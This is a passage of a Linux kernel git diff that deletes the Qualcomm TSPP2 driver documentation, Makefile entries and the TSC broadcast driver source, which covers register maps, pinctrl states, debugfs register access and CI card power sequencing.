--			u8 *scrambling_bits_value);
--	Get the current scrambling bits.
--
--Events notifications registration:
------------------------------------
--int tspp2_global_event_notification_register(u32 dev_id,
--			u32 global_event_bitmask,
--			void (*callback)(void *cookie),
--			void *cookie);
--	Get notified on a global event.
--
--int tspp2_src_event_notification_register(u32 src_handle,
--			u32 src_event_bitmask,
--			void (*callback)(void *cookie),
--			void *cookie);
--	Get notified on a source event.
--
--int tspp2_filter_event_notification_register(u32 filter_handle,
--			u32 filter_event_bitmask,
--			void (*callback)(void *cookie),
--			void *cookie);
--	Get notified on a filter event.
--
--Data path API
------------------
--int tspp2_pipe_descriptor_get(u32 pipe_handle, struct sps_iovec *desc);
--	Get a data descriptor from a pipe.
--
--int tspp2_pipe_descriptor_put(u32 pipe_handle, u32 addr,
--				u32 size, u32 flags);
--	Put (release) a descriptor for reuse by the pipe.
--
--int tspp2_pipe_last_address_used_get(u32 pipe_handle, u32 *address);
--	Get the last address the TSPP2 used.
--
--int tspp2_data_write(u32 src_handle, u32 offset, u32 size);
--	Write (feed) data to a source.
--
--User-space API
----------------
--The TSPP2 driver does not provide any user-space API, only a kernel-space API.
--The dvb/demux driver, which utilizes the TSPP2 driver (and HW), provides an
--extensive user-space API, allowing upper layers to achieve complex demuxing
--functionality.
--
--For further information please refer to Documentation/dvb/qcom-mpq.txt.
--
--Driver parameters
--=================
--The TSPP2 driver supports the following module parameter:
--tspp2_iommu_bypass: Bypass VBIF/IOMMU and use physical buffer addresses
--instead. This is mostly useful for debug purposes if something is wrong with
--the IOMMU configuration. Default is false.
--
--Platform-dependent parameters (e.g., IRQ numbers) are provided to the driver
--via the device tree mechanism or the platform device data mechanism.
--
--Config options
--==============
--To enable the driver, set CONFIG_TSPP2 to y (built-in) or m (kernel module)
--in the kernel configuration menu.
--
--Dependencies
--============
--a. The TSPP2 driver uses the SPS driver to control the BAM unit.
--b. The TSPP2 driver uses the ION driver for IOMMU registration and buffer
--mapping. The client is responsible to allocate memory buffers via ION.
--
--User space utilities
--====================
--None.
--
--Other
--=====
--None.
--
--Known issues
--============
--None.
--
--To do
--=====
--None.
-diff --git a/drivers/media/platform/msm/broadcast/Makefile b/drivers/media/platform/msm/broadcast/Makefile
-index 1233d6d..5e72b0d 100644
---- a/drivers/media/platform/msm/broadcast/Makefile
-+++ b/drivers/media/platform/msm/broadcast/Makefile
-@@ -3,9 +3,7 @@
- #
- 
- obj-$(CONFIG_TSPP) += tspp.o
--obj-$(CONFIG_TSPP2) += tspp2.o
- obj-$(CONFIG_CI_BRIDGE_SPI) += ci-bridge-spi.o
--obj-$(CONFIG_TSC) += tsc.o
- obj-$(CONFIG_ENSIGMA_UCCP_330) += ensigma_uccp330.o
- obj-$(CONFIG_DEMOD_WRAPPER) += demod_wrapper.o
- 
-diff --git a/drivers/media/platform/msm/broadcast/tsc.c b/drivers/media/platform/msm/broadcast/tsc.c
-deleted file mode 100644
-index ec3142e..0000000
---- a/drivers/media/platform/msm/broadcast/tsc.c
-+++ /dev/null
-@@ -1,3450 +0,0 @@
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-- *
-- * This program is free software; you can redistribute it and/or modify
-- * it under the terms of the GNU General Public License version 2 and
-- * only version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-- * GNU General Public License for more details.
-- */
--
--#include <linux/tsc.h>
--#include <linux/init.h>
--#include <linux/module.h>
--#include <linux/device.h>        /* Device drivers need this */
--#include <linux/cdev.h>		/* Char device drivers need that */
--#include <linux/kernel.h>        /* for KERN_INFO */
--#include <linux/fs.h>
--#include <linux/completion.h>	/* for completion signaling after interrupts */
--#include <linux/uaccess.h>	/* for copy from/to user in the ioctls */
--#include <linux/msm_iommu_domains.h>
--#include <linux/mutex.h>
--#include <linux/of.h>		/* parsing device tree data */
--#include <linux/of_gpio.h>
--#include <linux/of_irq.h>
--#include <mach/gpio.h>		/* gpios definitions */
--#include <linux/pinctrl/consumer.h> /* pinctrl API */
--#include <linux/clk.h>
--#include <linux/wait.h>          /* wait() macros, sleeping */
--#include <linux/sched.h>         /* Externally defined globals */
--#include <linux/poll.h>          /* poll() file op */
--#include <linux/io.h>            /* IO macros */
--#include <linux/bitops.h>
--#include <linux/msm_ion.h>	/* ion_map_iommu */
--#include <linux/iommu.h>
--#include <linux/platform_device.h>
--#include <linux/slab.h>          /* kfree, kzalloc */
--#include <linux/debugfs.h>	/* debugfs support */
--#include <linux/pm_runtime.h>	/* debugfs support */
--#include <linux/pm_wakeup.h>	/* debugfs support */
--#include <linux/regulator/consumer.h> /* gdsc */
--#include <linux/msm-bus.h>	/* bus client */
--#include <linux/delay.h>	/* usleep function */
--/* TODO: include <linux/mpq_standby_if.h> after MCU is mainlined */
--
--/*
-- * General defines
-- */
--#define TEST_BIT(pos, number) (number & (1 << pos))
--#define CLEAR_BIT(pos, number) (number &= ~(1 << pos))
--#define SET_BIT(pos, number) (number |= 1 << pos)
--
--/*
-- * extract bits [@b0:@b1] (inclusive) from the value @x
-- * it should be @b0 <= @b1, or result is incorrect
-- */
--static inline u32 GETL_BITS(u32 x, int b0, int b1)
--{
--	return (x >> b0) & ((1 << (b1 - b0 + 1)) - 1);
--}
--
--/* Bypass VBIF/IOMMU for debug and bring-up purposes */
--static int tsc_iommu_bypass; /* defualt=0 using iommu */
--module_param(tsc_iommu_bypass, int, S_IRUGO | S_IWUSR | S_IWGRP);
--
--/* The rate of the clock that control TS from TSC to the CAM */
--#define CICAM_CLK_RATE_12MHZ		12000000
--#define CICAM_CLK_RATE_9MHZ		8971962
--#define CICAM_CLK_RATE_7MHZ		7218045
--/* Rates for TSC serial and parallel clocks */
--#define TSC_SER_CLK_RATE		192000000
--#define TSC_PAR_CLK_RATE		24000000
--
--/* CICAM address space according to CI specification */
--#define CICAM_MAX_ADDRESS		3
--
--/*
-- * TSC register offsets
-- */
--#define TSC_HW_VERSION			(0x0)
--#define TSC_MUX_CFG			(0x4)	/* Muxs config */
--#define TSC_IN_IFC_EXT			(0x8)	/* External demods tsifs */
--#define TSC_IN_IFC_CFG_INT		(0xc)	/* internal demods and
--						cicam tsif config */
--#define TSC_FSM_STATE			(0x50)	/* Read FSM state */
--#define TSC_FSM_STATE_MASK		(0x54)	/* Config FSM state */
--#define TSC_CAM_CMD			(0x1000)/* Config cam commands */
--#define TSC_CAM_RD_DATA			(0x1004)/* read data for single-mode
--							byte */
--#define TSC_STAT			(0x1008)/* Interrupts status */
--#define TSC_IRQ_ENA			(0x100C)/* Enable interrupts */
--#define TSC_IRQ_CLR			(0x1010)/* Clear interrupts */
--#define TSC_CIP_CFG			(0x1014)/* Enable HW polling */
--#define TSC_CD_STAT			(0x1020)/* Card pins status */
--#define TSC_RD_BUFF_ADDR		(0x1024)/* Vbif address for read
--						buffer */
--#define TSC_WR_BUFF_ADDR		(0x1028)/* Vbif address for write
--						buffer */
--#define TSC_FALSE_CD			(0x102C)/* Counter of false card
--						detection */
--#define TSC_FALSE_CD_CLR		(0x1030)/* Clear false cd counter */
--#define TSC_RESP_ERR			(0x1034)/* State of read/write buffer
--						error */
--#define TSC_CICAM_TSIF			(0x1038)/* Enable tsif (tsc->cam) */
--
--
--/*
-- * Registers structure definitions
-- */
--
--/* TSC_MUX_CFG */
--#define MUX_EXTERNAL_DEMOD_0			0
--#define MUX_EXTERNAL_DEMOD_1			1
--#define MUX_INTERNAL_DEMOD			2
--#define MUX_CICAM				3
--#define MUX0_OFFS				0
--#define MUX1_OFFS				2
--#define MUX_CAM_OFFS				4
--
--/* TSC_IN_IFC_EXT and TSC_IN_IFC_CFG_INT*/
--#define TSIF_INPUT_ENABLE			0
--#define TSIF_INPUT_DISABLE			1
--
--#define TSIF_CLK_POL_OFFS			0
--#define TSIF_DATA_POL_OFFS			1
--#define TSIF_START_POL_OFFS			2
--#define TSIF_VALID_POL_OFFS			3
--#define TSIF_ERROR_POL_OFFS			4
--#define TSIF_SER_PAR_OFFS			5
--#define TSIF_REC_MODE_OFFS			6
--#define TSIF_DATA_SWAP_OFFS			8
--#define TSIF_DISABLE_OFFS			9
--#define TSIF_ERR_INSERT_OFFS			10
--
--/* TSC_FSM_STATE and TSC_FSM_STATE_MASK*/
--#define FSM_STATE_BUFFER_BEG			0
--#define FSM_STATE_BUFFER_END			3
--#define FSM_STATE_POLL_BEG			8
--#define FSM_STATE_POLL_END			10
--#define FSM_STATE_BYTE_BEG			12
--#define FSM_STATE_BYTE_END			13
--#define FSM_STATE_MEM_WR_BEG			16
--#define FSM_STATE_MEM_WR_END			17
--#define FSM_STATE_MEM_RD_BEG			20
--#define FSM_STATE_MEM_RD_END			21
--#define FSM_STATE_IO_RD_BEG			24
--#define FSM_STATE_IO_RD_END			25
--#define FSM_STATE_IO_WR_BEG			28
--#define FSM_STATE_IO_WR_END			29
--
--/* TSC_CAM_CMD */
--#define MEMORY_TRANSACTION			0
--#define IO_TRANSACTION				1
--#define WRITE_TRANSACTION			0
--#define READ_TRANSACTION			1
--#define SINGLE_BYTE_MODE			0
--#define BUFFER_MODE				1
--
--#define CAM_CMD_ADDR_SIZE_OFFS			0
--#define CAM_CMD_WR_DATA_OFFS			16
--#define CAM_CMD_IO_MEM_OFFS			24
--#define CAM_CMD_RD_WR_OFFS			25
--#define CAM_CMD_BUFF_MODE_OFFS			26
--#define CAM_CMD_ABORT				27
--
--/* TSC_STAT, TSC_IRQ_ENA and TSC_IRQ_CLR */
--#define CAM_IRQ_EOT_OFFS			0
--#define CAM_IRQ_POLL_OFFS			1
--#define CAM_IRQ_RATE_MISMATCH_OFFS		2
--#define CAM_IRQ_ERR_OFFS			3
--#define CAM_IRQ_ABORTED_OFFS			4
--
--/* TSC_CD_STAT */
--#define TSC_CD_STAT_INSERT			0x00
--#define TSC_CD_STAT_ERROR1			0x01
--#define TSC_CD_STAT_ERROR2			0x02
--#define TSC_CD_STAT_REMOVE			0x03
--
--#define TSC_CD_BEG				0
--#define TSC_CD_END				1
--
--/* TSC_CICAM_TSIF */
--#define TSC_CICAM_TSIF_OE_OFFS			0
--
--/* Data structures */
--
--/**
-- * enum transaction_state - states for the transacation interrupt reason
-- */
--enum transaction_state {
--	BEFORE_TRANSACTION = 0,
--	TRANSACTION_SUCCESS = 1,
--	TRANSACTION_ERROR = -1,
--	TRANSACTION_CARD_REMOVED = -2
--};
--
--/**
--* enum pcmcia_state - states for the pcmcia pinctrl states
--* Note: the numbers here corresponds to the numbers of enum tsc_cam_personality
--* in tsc.h file.
--*/
--enum pcmcia_state {
--	PCMCIA_STATE_DISABLE = 0,
--	PCMCIA_STATE_CI_CARD = 1,
--	PCMCIA_STATE_CI_PLUS = 2,
--	PCMCIA_STATE_PC_CARD = 3
--};
--
--/**
-- * struct iommu_info - manage all the iommu information
-- *
-- * @group:		TSC IOMMU group.
-- * @domain:		TSC IOMMU domain.
-- * @domain_num:		TSC IOMMU domain number.
-- * @partition_num:	TSC iommu partition number.
-- * @ion_client:		TSC IOMMU client.
-- * @iommu_group_name	TSC IOMMU group name.
-- */
--struct iommu_info {
--	struct iommu_group *group;
--	struct iommu_domain *domain;
--	int domain_num;
--	int partition_num;
--	struct ion_client *ion_client;
--	const char *iommu_group_name;
--};
--
--/**
-- * struct pinctrl_current_state - represent which TLMM pins currently active
-- *
-- * @ts0:		true if TS-in 0 is active, false otherwise.
-- * @ts1:		true if TS-in 1 is active, false otherwise.
-- * @pcmcia_state:	Represent the pcmcia pins state.
-- */
--struct pinctrl_current_state {
--	bool ts0;
--	bool ts1;
--	enum pcmcia_state pcmcia_state;
--};
--/**
-- * struct pinctrl_info - manage all the pinctrl information
-- *
-- * @pinctrl:		TSC pinctrl state holder.
-- * @disable:		pinctrl state to disable all the pins.
-- * @ts0:		pinctrl state to activate TS-in 0 alone.
-- * @ts1:		pinctrl state to activate TS-in 1 alone.
-- * @dual_ts:		pinctrl state to activate both TS-in.
-- * @pc_card:		pinctrl state to activate pcmcia upon card insertion.
-- * @ci_card:		pinctrl state to activate pcmcia after personality
-- *			change to CI card.
-- * @ci_plus:		pinctrl state to activate pcmcia after personality
-- *			change to CI+ card.
-- * @ts0_pc_card:	pinctrl state to activate TS-in 0 and pcmcia upon card
-- *			insertion.
-- * @ts0_ci_card:	pinctrl state to activate TS-in 0 and pcmcia after
-- *			personality change to CI card.
-- * @ts0_ci_plus:	pinctrl state to activate TS-in 0 and pcmcia after
-- *			personality change to CI+ card.
-- * @ts1_pc_card:	pinctrl state to activate TS-in 1 and pcmcia upon card
-- *			insertion.
-- * @ts1_ci_card:	pinctrl state to activate TS-in 1 and pcmcia after
-- *			personality change to CI card.
-- * @ts1_ci_plus:	pinctrl state to activate TS-in 1 and pcmcia after
-- *			personality change to CI+ card.
-- * @dual_ts_pc_card:	pinctrl state to activate both TS-in and pcmcia upon
-- *			card insertion.
-- * @dual_ts_ci_card:	pinctrl state to activate both TS-in and pcmcia after
-- *			personality change to CI card.
-- * @dual_ts_ci_plus:	pinctrl state to activate both TS-in and pcmcia after
-- *			personality change to CI+ card.
-- * @is_ts0:		true if ts0 pinctrl states exist in device tree, false
-- *			otherwise.
-- * @is_ts1:		true if ts1 pinctrl states exist in device tree, false
-- *			otherwise.
-- * @is_pcmcia:		true if pcmcia pinctrl states exist in device tree,
-- *			false otherwise.
-- * @curr_state:		the current state of the TLMM pins.
-- */
--struct pinctrl_info {
--	struct pinctrl *pinctrl;
--	struct pinctrl_state *disable;
--	struct pinctrl_state *ts0;
--	struct pinctrl_state *ts1;
--	struct pinctrl_state *dual_ts;
--	struct pinctrl_state *pc_card;
--	struct pinctrl_state *ci_card;
--	struct pinctrl_state *ci_plus;
--	struct pinctrl_state *ts0_pc_card;
--	struct pinctrl_state *ts0_ci_card;
--	struct pinctrl_state *ts0_ci_plus;
--	struct pinctrl_state *ts1_pc_card;
--	struct pinctrl_state *ts1_ci_card;
--	struct pinctrl_state *ts1_ci_plus;
--	struct pinctrl_state *dual_ts_pc_card;
--	struct pinctrl_state *dual_ts_ci_card;
--	struct pinctrl_state *dual_ts_ci_plus;
--	bool is_ts0;
--	bool is_ts1;
--	bool is_pcmcia;
--	struct pinctrl_current_state curr_state;
--};
--
--/**
-- * struct tsc_mux_chdev - TSC Mux character device
-- *
-- * @cdev:		TSC Mux cdev.
-- * @mutex:		A mutex for mutual exclusion between Mux API calls.
-- * @poll_queue:		Waiting queue for rate mismatch interrupt.
-- * @spinlock:	        A spinlock to protect accesses to
-- *			data structures that happen from APIs and ISRs.
-- * @rate_interrupt:	A flag indicating if rate mismatch interrupt received.
-- */
--struct tsc_mux_chdev {
--	struct cdev cdev;
--	struct mutex mutex;
--	wait_queue_head_t poll_queue;
--	spinlock_t spinlock;
--	bool rate_interrupt;
--};
--
--/**
-- * struct tsc_ci_chdev - TSC CI character device
-- *
-- * @cdev:		TSC CI cdev.
-- * @mutex:		A mutex for mutual exclusion between CI API calls.
-- * @poll_queue:		Waiting queue for card detection interrupt.
-- * @spinlock:	        A spinlock to protect accesses to data structures that
-- *			happen from APIs and ISRs.
-- * @transaction_complete: A completion struct indicating end of data
-- *			transaction.
-- * @transaction_finish: A completion struct indicating data transaction func
-- *                      has finished.
-- * @transaction_state:	flag indicating the reason for transaction end.
-- * @ci_card_status:	The last card status received by the upper layer.
-- * @data_busy:          true when the device is in the middle of data
-- *                      transaction operation, false otherwise.
-- */
--struct tsc_ci_chdev {
--	struct cdev cdev;
--	struct mutex mutex;
--	wait_queue_head_t poll_queue;
--	spinlock_t spinlock;
--	struct completion transaction_complete;
--	struct completion transaction_finish;
--	enum transaction_state transaction_state;
--	enum tsc_card_status card_status;
--	bool data_busy;
--};
--
--/**
-- * struct tsc_device - TSC device
-- *
-- * @pdev:		TSC platform device.
-- * @device_mux:		Mux device for sysfs and /dev entry.
-- * @device_ci:		CI device for sysfs and /dev entry.
-- * @mux_chdev:		TSC Mux character device instance.
-- * @ci_chdev:		TSC CI character device instance.
-- * @mux_device_number:	TSC Mux major number.
-- * @ci_device_number:	TSC CI major number.
-- * @num_mux_opened:	A counter to ensure 1 TSC Mux character device.
-- * @num_ci_opened:	A counter to ensure 1 TSC CI character device.
-- * @num_device_open:	A counter to synch init of power and bus voting.
-- * @mutex:              Global mutex to to synch init of power and bus voting.
-- * @base:		Base memory address for the TSC registers.
-- * @card_detection_irq:	Interrupt No. of the card detection interrupt.
-- * @cam_cmd_irq:	Interrupt No. of the cam cmd interrupt.
-- * @iommu_info:		TSC IOMMU parameters.
-- * @ahb_clk:		The clock for accessing the TSC registers.
-- * @ci_clk:		The clock for TSC internal logic.
-- * @ser_clk:		The clock for synchronizing serial TS input.
-- * @par_clk:		The clock for synchronizing parallel TS input.
-- * @cicam_ts_clk:	The clock for pushing TS data into the cicam.
-- * @tspp2_core_clk:	The clock for enabling the TSPP2.
-- * @vbif_tspp2_clk:	The clock for accessing the VBIF.
-- * @vbif_ahb_clk:	The clock for VBIF AHB.
-- * @vbif_axi_clk:	The clock for VBIF AXI.
-- * @gdsc:               The Broadcast GDSC.
-- * @bus_client:         The TSC bus client.
-- * @pinctrl_info:	TSC pinctrl parameters.
-- * @reset_cam_gpio:	GPIO No. for CAM HW reset.
-- * @hw_card_status:	The card status as reflected by the HW registers.
-- * @card_power:		True if the card is powered up, false otherwise.
-- * @debugfs_entry:      TSC device debugfs entry.
-- */
--struct tsc_device {
--	struct platform_device *pdev;
--	struct device *device_mux;
--	struct device *device_ci;
--	struct tsc_mux_chdev mux_chdev;
--	struct tsc_ci_chdev ci_chdev;
--	dev_t mux_device_number;
--	dev_t ci_device_number;
--	int num_mux_opened;
--	int num_ci_opened;
--	int num_device_open;
--	struct mutex mutex;
--	void __iomem *base;
--	unsigned int card_detection_irq;
--	unsigned int cam_cmd_irq;
--	struct iommu_info iommu_info;
--	struct clk *ahb_clk;
--	struct clk *ci_clk;
--	struct clk *ser_clk;
--	struct clk *par_clk;
--	struct clk *cicam_ts_clk;
--	struct clk *tspp2_core_clk;
--	struct clk *vbif_tspp2_clk;
--	struct clk *vbif_ahb_clk;
--	struct clk *vbif_axi_clk;
--	struct regulator *gdsc;
--	uint32_t bus_client;
--	struct pinctrl_info pinctrl_info;
--	int reset_cam_gpio;
--	enum tsc_card_status hw_card_status;
--	bool card_power;
--	struct dentry *debugfs_entry;
--};
--
--/* Global TSC device class */
--static struct class *tsc_class;
--
--/* Global TSC device database */
--static struct tsc_device *tsc_device;
--
--/************************** Debugfs Support **************************/
--/* debugfs entries */
--#define TSC_S_RW	(S_IRUGO | S_IWUSR)
--
--struct debugfs_entry {
--	const char *name;
--	mode_t mode;
--	int offset;
--};
--
--static const struct debugfs_entry tsc_regs_32[] = {
--		{"tsc_hw_version", S_IRUGO, TSC_HW_VERSION},
--		{"tsc_mux", TSC_S_RW, TSC_MUX_CFG},
--		{"tsif_external_demods", TSC_S_RW, TSC_IN_IFC_EXT},
--		{"tsif_internal_demod_cam", TSC_S_RW, TSC_IN_IFC_CFG_INT},
--		{"tsc_fsm_state", S_IRUGO, TSC_FSM_STATE},
--		{"tsc_fsm_state_mask", TSC_S_RW, TSC_FSM_STATE_MASK},
--		{"tsc_cam_cmd", TSC_S_RW, TSC_CAM_CMD},
--		{"tsc_rd_buff_addr", TSC_S_RW, TSC_RD_BUFF_ADDR},
--		{"tsc_wr_buff_addr", TSC_S_RW, TSC_WR_BUFF_ADDR},
--};
--
--static const struct debugfs_entry tsc_regs_16[] = {
--		{"tsc_false_cd_counter", S_IRUGO, TSC_FALSE_CD},
--		{"tsc_cicam_tsif", TSC_S_RW, TSC_CICAM_TSIF},
--};
--
--static const struct debugfs_entry tsc_regs_8[] = {
--		{"tsc_cam_rd_data", S_IRUGO, TSC_CAM_RD_DATA},
--		{"tsc_irq_stat", S_IRUGO, TSC_STAT},
--		{"tsc_irq_ena", TSC_S_RW, TSC_IRQ_ENA},
--		{"tsc_irq_clr", TSC_S_RW, TSC_IRQ_CLR},
--		{"tsc_ena_hw_poll", TSC_S_RW, TSC_CIP_CFG},
--		{"tsc_card_stat", TSC_S_RW, TSC_CD_STAT},
--		{"tsc_false_cd_counter_clr", TSC_S_RW, TSC_FALSE_CD_CLR},
--		{"tsc_last_error_resp", S_IRUGO, TSC_RESP_ERR},
--};
--
--/* debugfs settings */
--static int debugfs_iomem_set(void *data, u64 val)
--{
--	if (mutex_lock_interruptible(&tsc_device->mutex))
--		return -ERESTARTSYS;
--
--	if (!tsc_device->num_device_open) {
--		mutex_unlock(&tsc_device->mutex);
--		return -ENXIO;
--	}
--
--	mutex_unlock(&tsc_device->mutex);
--
--	writel_relaxed(val, data);
--	wmb();
--
--	return 0;
--}
--
--static int debugfs_iomem_get(void *data, u64 *val)
--{
--	if (mutex_lock_interruptible(&tsc_device->mutex))
--		return -ERESTARTSYS;
--
--	if (!tsc_device->num_device_open) {
--		mutex_unlock(&tsc_device->mutex);
--		return -ENXIO;
--	}
--
--	mutex_unlock(&tsc_device->mutex);
--
--	*val = readl_relaxed(data);
--
--	return 0;
--}
--
--DEFINE_SIMPLE_ATTRIBUTE(fops_iomem_x32, debugfs_iomem_get,
--			debugfs_iomem_set, "0x%08llX");
--DEFINE_SIMPLE_ATTRIBUTE(fops_iomem_x16, debugfs_iomem_get,
--			debugfs_iomem_set, "0x%04llX");
--DEFINE_SIMPLE_ATTRIBUTE(fops_iomem_x8, debugfs_iomem_get,
--			debugfs_iomem_set, "0x%02llX");
--
--/**
-- * tsc_debugfs_init() - TSC device debugfs initialization.
-- */
--static void tsc_debugfs_init(void)
--{
--	int i;
--	struct dentry *dentry;
--	void __iomem *base = tsc_device->base;
--
--	tsc_device->debugfs_entry = debugfs_create_dir("tsc", NULL);
--	if (!tsc_device->debugfs_entry)
--			return;
--	dentry = debugfs_create_dir("regs", tsc_device->debugfs_entry);
--	if (dentry) {
--		for (i = 0; i < ARRAY_SIZE(tsc_regs_32); i++) {
--			debugfs_create_file(
--					tsc_regs_32[i].name,
--					tsc_regs_32[i].mode,
--					dentry,
--					base + tsc_regs_32[i].offset,
--					&fops_iomem_x32);
--		}
--		for (i = 0; i < ARRAY_SIZE(tsc_regs_16); i++) {
--			debugfs_create_file(
--					tsc_regs_16[i].name,
--					tsc_regs_16[i].mode,
--					dentry,
--					base + tsc_regs_16[i].offset,
--					&fops_iomem_x16);
--		}
--		for (i = 0; i < ARRAY_SIZE(tsc_regs_8); i++) {
--			debugfs_create_file(
--					tsc_regs_8[i].name,
--					tsc_regs_8[i].mode,
--					dentry,
--					base + tsc_regs_8[i].offset,
--					&fops_iomem_x8);
--		}
--	}
--}
--
--/**
-- * tsc_debugfs_exit() - TSC device debugfs teardown.
-- */
--static void tsc_debugfs_exit(void)
--{
--	debugfs_remove_recursive(tsc_device->debugfs_entry);
--	tsc_device->debugfs_entry = NULL;
--}
--
--/**
-- * tsc_update_hw_card_status() - Update the hw_status according to the HW reg.
-- *
-- * Read the register indicating the card status (inserted, removed, error) and
-- * update the tsc_device->hw_card_status accordingly.
-- */
--static void tsc_update_hw_card_status(void)
--{
--	u32 cd_reg, card_status = 0;
--
--	cd_reg = readl_relaxed(tsc_device->base + TSC_CD_STAT);
--	card_status = GETL_BITS(cd_reg, TSC_CD_BEG, TSC_CD_END);
--	switch (card_status) {
--	case TSC_CD_STAT_INSERT:
--		tsc_device->hw_card_status = TSC_CARD_STATUS_DETECTED;
--		break;
--	case TSC_CD_STAT_ERROR1:
--	case TSC_CD_STAT_ERROR2:
--		tsc_device->hw_card_status = TSC_CARD_STATUS_FAILURE;
--		break;
--	case TSC_CD_STAT_REMOVE:
--		tsc_device->hw_card_status = TSC_CARD_STATUS_NOT_DETECTED;
--		break;
--	}
--}
--
--/**
-- * tsc_card_power_down() - power down card interface upon removal.
-- *
-- * Power down the card by disable VPP, disable pins in the TLMM, assert the
-- * reset line and disable the level-shifters. This function assumes the spinlock
-- * of ci device is already taken.
-- *
-- * Return 0 on finish, error value if interrupted while acquiring a mutex.
-- */
--static int tsc_card_power_down(void)
--{
--	int ret = 0;
--	struct pinctrl_info *ppinctrl = &tsc_device->pinctrl_info;
--	struct pinctrl_current_state *pcurr_state = &ppinctrl->curr_state;
--	int reset_gpio = tsc_device->reset_cam_gpio;
--	u32 reg = 0;
--
--	/* Clearing CAM TSIF OE to disable I/O CAM transactions */
--	CLEAR_BIT(TSC_CICAM_TSIF_OE_OFFS, reg);
--	writel_relaxed(reg, tsc_device->base + TSC_CICAM_TSIF);
--
--	/* Assert the reset line */
--	ret = gpio_direction_output(reset_gpio, 1); /* assert */
--	if (ret != 0)
--		pr_err("%s: Failed to assert the reset CAM GPIO\n", __func__);
--
--	/* Disable all the level-shifters */
--	/* TODO: call mpq_standby_pcmcia_master0_set(0) after MCU mainlined */
--	if (ret != 0)
--		pr_err("%s: error disable master0 level-shifters. ret value = %d\n",
--				__func__, ret);
--	/* TODO: call mpq_standby_pcmcia_master1_set(1) after MCU mainlined */
--	if (ret != 0)
--		pr_err("%s: error disable master1 level-shifters. ret value = %d\n",
--				__func__, ret);
--
--	/* Power-down the card */
--	/* TODO: call mpq_standby_pcmcia_vpp_set(1) after MCU mainlined */
--	if (ret != 0)
--		pr_err("%s: error disabling VPP. ret value = %d\n", __func__,
--				ret);
--	/* Wait 10msec until VPP become stable */
--	usleep(10000);
--
--	/* Disable pins in the TLMM */
--	if (mutex_lock_interruptible(&tsc_device->mutex))
--		return -ERESTARTSYS;
--
--	if (pcurr_state->ts0 && pcurr_state->ts1)
--		ret = pinctrl_select_state(ppinctrl->pinctrl,
--				ppinctrl->dual_ts);
--	else if (pcurr_state->ts0 && !pcurr_state->ts1)
--		ret = pinctrl_select_state(ppinctrl->pinctrl,
--				ppinctrl->ts0);
--	else if (!pcurr_state->ts0 && pcurr_state->ts1)
--		ret = pinctrl_select_state(ppinctrl->pinctrl,
--				ppinctrl->ts1);
--	else
--		ret = pinctrl_select_state(ppinctrl->pinctrl,
--				ppinctrl->disable);
--	if (ret != 0)
--		pr_err("%s: error changing PCMCIA pins upon card removal. ret value = %d\n",
--					__func__, ret);
--	else
--		pcurr_state->pcmcia_state = PCMCIA_STATE_DISABLE;
--
--	mutex_unlock(&tsc_device->mutex);
--
--	return 0;
--}
--
--/**
-- * tsc_card_power_up() - power up card interface upon insertion.
-- *
-- * Power up the card by open VPP, enable pins in the TLMM, deassert the reset
-- * line and enable the level-shifters. This function assumes the spinlock of ci
-- * device is already taken.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_card_power_up(void)
--{
--	int ret = 0;
--	struct pinctrl_info *ppinctrl = &tsc_device->pinctrl_info;
--	struct pinctrl_current_state *pcurr_state = &ppinctrl->curr_state;
--	int reset_gpio = tsc_device->reset_cam_gpio;
--
--	/* Power-up the card */
--	/* TODO: call mpq_standby_pcmcia_vpp_set(1) after MCU mainlined */
--	if (ret != 0) {
--		pr_err("%s: error setting VPP. ret value = %d\n", __func__,
--				ret);
--		return ret;
--	}
--	/* Wait 10msec until VPP become stable */
--	usleep(10000);
--
--	/* Enable pins in the TLMM */
--	if (mutex_lock_interruptible(&tsc_device->mutex))
--		return -ERESTARTSYS;
--
--	if (pcurr_state->ts0 && pcurr_state->ts1)
--		ret = pinctrl_select_state(ppinctrl->pinctrl,
--				ppinctrl->dual_ts_pc_card);
--	else if (pcurr_state->ts0 && !pcurr_state->ts1)
--		ret = pinctrl_select_state(ppinctrl->pinctrl,
--				ppinctrl->ts0_pc_card);
--	else if (!pcurr_state->ts0 && pcurr_state->ts1)
--		ret = pinctrl_select_state(ppinctrl->pinctrl,
--				ppinctrl->ts1_pc_card);
--	else
--		ret = pinctrl_select_state(ppinctrl->pinctrl,
--				ppinctrl->pc_card);
--	if (ret != 0) {
--		pr_err("%s: error changing PCMCIA pins upon card insertion. ret value = %d\n",
--					__func__, ret);
--		mutex_unlock(&tsc_device->mutex);
--		goto err;
--	} else {
--		pcurr_state->pcmcia_state = PCMCIA_STATE_PC_CARD;
--	}
--	mutex_unlock(&tsc_device->mutex);
--
--	/* Release the reset line */
--	ret = gpio_direction_output(reset_gpio, 0); /* Deassert */
--	if (ret != 0) {
--		pr_err("%s: Failed to deassert the reset CAM GPIO\n", __func__);
--		goto err;
--	}
--
--	/* Enable level-shifters for all pins */
--	/* TODO: call mpq_standby_pcmcia_master0_set(0) after MCU mainlined */
--	if (ret != 0) {
--		pr_err("%s: error setting master0 level-shifters. ret value = %d\n",
--				__func__, ret);
--		goto err;
--	}
--	/* TODO: call mpq_standby_pcmcia_master1_set(0) after MCU mainlined */
--	if (ret != 0) {
--		pr_err("%s: error setting master1 level-shifters. ret value = %d\n",
--				__func__, ret);
--		goto err;
--	}
--
--	/* Wait 20msec at the end of the power-up sequence */
--	usleep(20000);
--
--	return ret;
--
--err:
--	tsc_card_power_down();
--	return ret;
--}
--
--/************************** Interrupt handlers **************************/
--/**
-- * tsc_card_detect_irq_thread_handler() - TSC card detect interrupt handler.
-- *
-- * @irq:	Interrupt number.
-- * @dev:	TSC device.
-- *
-- * The handler is executed on a thread context, not in the interrupt context
-- * (can take a mutex and sleep).
-- * Read the card detection status from the register and initiate a power-up/down
-- * sequence accordingly. The sequence will occur only if a change is needed in
-- * the current power state.
-- *
-- */
--static irqreturn_t tsc_card_detect_irq_thread_handler(int irq, void *dev)
--{
--	int ret = 0;
--	struct tsc_ci_chdev *tsc_ci;
--	unsigned long flags = 0;
--
--	tsc_ci = &tsc_device->ci_chdev;
--
--	mutex_lock(&tsc_ci->mutex);
--
--	tsc_update_hw_card_status();
--
--	/* waking-up ci poll queue */
